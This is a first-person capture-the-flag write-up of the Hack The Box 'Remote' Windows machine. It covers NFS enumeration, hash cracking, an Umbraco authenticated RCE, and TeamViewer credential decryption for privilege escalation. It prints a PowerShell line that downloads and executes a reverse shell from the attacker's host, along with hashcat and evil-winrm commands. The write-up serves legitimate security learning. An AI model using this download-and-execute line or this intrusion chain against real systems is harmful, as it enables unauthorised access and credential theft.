# REMOTE | 10.10.10.180

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial $IP

### Open Ports and Their Services

* 21 - FTP - Microsoft ftpd
* 80 - HTTP - Microsoft HTTPAPI
* 111 - RPCBIND
* 135 - MSRPC
* 139/445 - SMB
* 2049 - NFS
* 5985 - WSMN/WINRM
* 47001 - WINRM
* 49664-49680 - MSRPC

## Service Enumeration

### 21 - FTP

This FTP server allows anonymous access, but I am unable to see if there is anything in the directory, which seems to be the root dir:

![](img/ftp-enum1.png)

I am also unable to create a directory nor can I upload files:

![](img/ftp-enum2.png)

Time to move on for now.

### 80 - HTTP

This looks like almost a fully functional website, with many directories and links. Running

    gobuster dir -u http://10.10.10.180 -w /usr/share/wordlists/dirb/common.txt -x txt  

gives me some good output, and a couple directories that are not listed on the main page:

![](img/gobuster.png)

I ran a Nikto scan, but it didn't really add anything to the picture. The source code indicates it is maybe a CMS suite called Umbraco, and when I navigate to either /install or /umbraco, I am taken to a login screen.

![](img/source.png)

![](img/login.png)

A searchsploit query shows a single Authenticated RCE for a certain version of Umbraco (which I am not sure of yet), so unless I get valid credentials, this won't be my way in.  
I will move on until I get them somehow.

### 111 - RPCBIND

This, in conjunction with port 2049 being open, shows me that this box has a network file share available. More on that later.

### 139/445 - SMB

I am unable to enumerate SMB as I need valid credentials to move forward.

### 2049 - NFS

I am able to find out what shares are available to mount locally here, which is a big deal:

![](img/showmount.png)

I am able to mount the dir in a temporary directory and view it's contents. It appears to be a backup of the site running on port 80:

![](img/mount.png)

My guess would be that I am looking for credentials in this directory somewhere. So I'm going through the dirs, searching for strings in config files etc etc. I found a file called 'Umbraco.sdf' and decided to pipe it through less, despite it being a binary file:

![](img/umbraco-sdf.png)

Looks like I found some creds! And helpfully they let me know the encryption format.

So I have a possible username and a hashed password:

* admin@htb.local :: b8be16afba8c314ad33d812f22a04991b90e2aaa

I pop this hash into hashcat to see what it can make of it:

    hashcat -m 100 admin-hash /usr/share/wordlists/rockyou.txt

And a couple of seconds later I get the result back:

![](img/hashcat.png)

So the password (hopefully to login to the Umbraco interface) is 'baconandcheese'. Let's try that out.

![](img/panel.png)

Looks like I'm in! Time for the exploitation part.

## Exploitation

OK, I've copied that RCE python exploit into my working directory in order to have a look at it.

Looks like this is more of a POC exploit because it spawns the calculator in order to demonstrate command execution.

![](img/exploit-poc.png)

I'm going to have to parse that part of the code and figure out how to put code for a reverse shell in there somehow. Since this machine is running Windows, I think I could have it run powershell to download and execute a reverse shell.

The natural choice for this is the reverse shell script from [Nishang](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1), which I have cloned on my machine.

I've altered the code to what I think will work: there was a part that was empty called 'string cmd' - in the quotes I put the powershell arguments (iex(New-Object Net.WebClient).downloadString('http://10.10.14.36/rev.ps1')), and then in place of 'calc.exe' I put 'powershell.exe' because that gets called and then the arguments are the 'cmd' variable established above it.

I am terrible with powershell, so this probably won't work on the first try and I'll be going in circles for hours until it either clicks or I'll have to look up the solution.

I have a netcat listener going, as well as a python server so the exploit can download the reverse shell payload.

![](img/user-shell.png)

And just like I thought - I struggled with syntax and escape sequences for nearly an hour before I figured it out, but look at that I have a shell.

Before I forget or lose my connection here is the flag:

![](img/user-flag.png) (insert flag screenshot here you moron)

For posterity, and because it took me forever to figure out, let me just put down what I typed in the rce script that finally worked.

In the 'string cmd' part I put in exactly this (inside the quotes):

    -NoProfile -Command iex(New-Object Net.WebClient).downloadString(\'http://10.10.14.36/rev.ps1\')

Then, in the 'FileName' section where it originally said 'calc.exe' I just put 'powershell.exe'. The whole time I had the right idea, but I couldn't figure out the correct way to escape the quotes.

OK, so now, it is time to enumerate, to find a way to privesc.

## User Enumeration

I am the weird 'IIS AppPool" user, and there does not appear to be a regular user, just the Administrator. This user has some interesting privileges though:

![](img/privs.png)

Interestingly, I can `cd` into the Administrator's folder but I cannot view the contents:

![](img/access.png)

### OS Discovery

`systeminfo` indicates that this is a **Windows Server 2019 Standard Build 17763** with 5 hotfixes installed.

### WindowsEnum.ps1

I've never used this enumeration script before, so I figure now is as good a time as any.

Waste of time: the script appeared to hang, and I never got any output. I waited about 15 minutes and then killed the script.

### PowerUp.ps1

I've had good luck with this one before, but it ran into problems too. The only thing it told me was that the current user has **SeImpersonatePrivilege**, which I knew already.

### winPEAS.exe

This worked just fine. It told me that TeamViewer was installed and running, as well as that the current user can modify the UsoSvc. One or both of these must be the privesc vector.

## Privilege Escalation

### TeamViewer

Did a lot of searching for some kind of exploit on this thing, and I think I finally found it. Turns out, TeamViewer stores passwords in the registry with a known key, and it can be decrypted. I looked around for a decrypter and finally found one based on python [here](https://github.com/ReverseBrain/CVE-2019-18988/blob/master/CVE-2019-18988.py).

All of the information required is already in the script, so all I had to do was run the script and I had the password:

![](img/password.png)

Now, how can I use this information? I can really only use it to escalate my privileges if this is the same password that the Administrator uses. And in this case the only user on the machine is the Administrator, so my chances are good.

I have many options at this point, but the first one I want to try is [Evil Win-RM](https://github.com/Hackplayers/evil-winrm), since I've never used it before. Apparently it is very powerful and you can do all kinds of things but I really just want the SYSTEM shell so I can grab the flag and run.  
So I just have to type the correct command since I think I have the admin credentials:

    evil-winrm -i 10.10.10.180 -u Administrator

And I am greeted with a multi-coloured SYSTEM shell:

![](img/root-shell.png)

And here is the root flag:

![](img/root-flag.png)

## Conclusion

I had a lot of fun with this box. It had more detail put into it than the boxes I have been working on lately, so it felt a bit more real. I had to do a lot of research and enumeration, and I got to learn about a new CMS that I'd never heard of before. 

The privesc was pretty satisfying too, even though with the decrypting I was out of my league and definitely standing on others' shoulders.

Also, getting to use evil win-rm for the final privesc was cool. I just tried another path with psexec and that works as well so it's always nice to have options.

Steps taken:

* Enumerate port 80 to find a login portal
* Mount a Network File Share and enumerate the directories until finding a username and hashed password in a config file
* Crack the hash and login to the portal to look around
* Use the credentials for an Authenticated RCE in order to get a low-priv shell
* Enumerate until noticing that TeamViewer is installed and has passwords in the registry encrypted with a known key
* Decrypt the password and then use Evil Win-RM or psexec to escalate privileges to root


